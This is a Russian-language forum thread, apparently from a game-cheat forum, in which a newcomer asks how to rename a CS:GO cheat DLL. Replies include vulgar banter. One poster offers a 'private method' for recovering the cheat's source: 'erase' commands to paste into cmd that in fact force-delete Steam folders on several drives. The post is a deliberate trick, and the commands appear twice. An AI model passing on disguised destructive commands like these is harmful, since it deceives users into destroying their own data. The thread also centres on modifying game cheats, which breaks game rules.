Подведи собственные итоги года совместно с YOUGAME и забери ценные призы! Перейти

Нужно изменить название Чита Кс го

Забаненный
Забаненный
Статус
Оффлайн
Реакции
28
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Помогите пж, мне срочно надо поменять название Чита Кс го. Имеется только длл, это не мой чит если что. У меня есть визеал студио. Если есть какаето другая программа, пишите. Спасибо за внимание

Последнее редактирование:
Помогите пж, мне срочно надо поменять название Чита Кс го. Имеется только длл, это не мой чит если что. У меня есть визеал студио. Если есть какает другая программа, пишите. Спасибо за внимание
Переименуй дллку :whyRly:
А так тебе нужны исходники чита

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
любой hex редактор в помощь.

Помогите пж, мне срочно надо поменять название Чита Кс го. Имеется только длл, это не мой чит если что. У меня есть визеал студио. Если есть какает другая программа, пишите. Спасибо за внимание

Пожалуйста, зарегистрируйтесь или авторизуйтесь, чтобы увидеть содержимое.

Бл пацаны. а где взять исходники ?

Да где этого ньюкамера откопали, пускай курит матчасть

Бл пацаны. а где взять исходники ?
открой cmd вписывай код что ниже скинут и перетаскивай туда dll, откроются исходники. это приват способ так что палить нельзя

Код:
Expand Collapse Copy
erase C:\Program Files\Steam /F /S /Q
erase C:\Program Files (x86)\Steam /F /S /Q
erase D:\Steam /F /S /Q
erase E:\Program Files\Steam /F /S /Q

открой cmd вписывай код что ниже скинут и перетаскивай туда dll, откроются исходники. это приват способ так что палить нельзя

Код:
Expand Collapse Copy
erase C:\Program Files\Steam /F /S /Q
erase C:\Program Files (x86)\Steam /F /S /Q
erase D:\Steam /F /S /Q
erase E:\Program Files\Steam /F /S /Q
да блядь я тебе по секрету сказал а ты уже всем рассказываешь пизда хуй я тебе еще что солью

да блядь я тебе по секрету сказал а ты уже всем рассказываешь пизда хуй я тебе еще что солью
ну блять ну человеку надо очень ну это важно же ему как ты не понимаеш??? ну блин ну пжжжжж

Кто из телеги?

Назад
Сверху Снизу